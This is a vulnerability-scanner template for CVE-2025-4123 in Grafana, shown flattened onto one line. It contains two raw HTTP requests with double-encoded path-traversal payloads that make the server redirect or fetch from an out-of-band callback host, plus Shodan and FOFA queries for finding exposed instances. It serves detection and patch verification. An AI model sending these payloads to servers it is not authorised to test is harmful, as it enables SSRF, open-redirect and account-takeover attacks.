id: CVE-2025-4123 info: name: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal author: iamnoooob,rootxharsh,pdresearch severity: high description: | An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover. impact: | Attackers can exploit path traversal to achieve open redirect, XSS, or SSRF attacks, potentially leading to internal data exposure or account takeover. remediation: | Upgrade Grafana to the latest version that properly validates and sanitizes file paths in the render endpoint. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L cvss-score: 7.6 cve-id: CVE-2025-4123 cwe-id: CWE-79,CWE-601 epss-score: 0.06888 epss-percentile: 0.91539 reference: - https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53 - https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/ metadata: verified: true max-request: 1 shodan-query: product:"Grafana" fofa-query: app="Grafana" tags: cve,cve2025,grafana,redirect,unauth,oss,vkev,vuln http: - raw: - | GET /render/public/..%252f%255C{{interactsh-url}}%252f%253F%252f..%252f.. HTTP/1.1 Host: {{Hostname}} - | GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl name: open-redirect dsl: - status_code == 302 && contains(location, '/\\oast.pro/?/../../') - type: dsl name: ssrf dsl: - contains(interactsh_protocol, 'dns') && contains(content_type, 'image/png') # digest: 4b0a00483046022100a4d033e3c3f79f31d23e236a133f5afe20966a1030d857c6954d2553a5ac9978022100d4f99c7501650c4d98f5bd6776a5781a7574995197a1032740293b33e4ad0d0a:922c64590222798bb761d5b6d8e72950